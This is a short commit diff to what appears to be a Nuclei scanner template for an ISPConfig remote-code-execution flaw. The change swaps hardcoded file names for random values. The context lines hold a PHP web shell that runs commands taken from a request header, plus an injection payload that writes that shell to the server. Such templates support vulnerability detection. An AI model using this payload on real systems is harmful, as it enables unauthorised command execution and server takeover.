address lint errors, generate rand values

patch-10
non-things 2024-08-16 18:22:59 -04:00
parent 7b814a7938
commit cec84fe2bf
1 changed files with 20 additions and 20 deletions

View File

@ -25,13 +25,13 @@ info:
tags: ispconfig,rce tags: ispconfig,rce
variables: variables:
lang-file: sbcoeybcmrpkgkiutdflqzfwvj.lng lang-file: "{{rand_text_alpha(26)}}.lng"
websh-file: f1f755911b4ce3bde7f811de445aebf1.php websh-file: "{{rand_text_alphanumeric(32)}}.php"
websh: "<?php print('____'); passthru($_SERVER['HTTP_C']); print('____'); ?>" websh: "<?php print('____'); passthru($_SERVER['HTTP_C']); print('____'); ?>"
websh-base64: "{{base64(websh)}}" websh-base64: "{{base64(websh)}}"
payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#" payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#"
payload-url-enc: "{{url_encode(payload)}}" payload-url-enc: "{{url_encode(payload)}}"
echo-cmd-hash: fa8b39a9446212dff83ed5d830f044a3 echo-cmd-hash: "{{rand_text_alphanumeric(32)}}"
echo-cmd: "echo {{echo-cmd-hash}}" echo-cmd: "echo {{echo-cmd-hash}}"
http: http: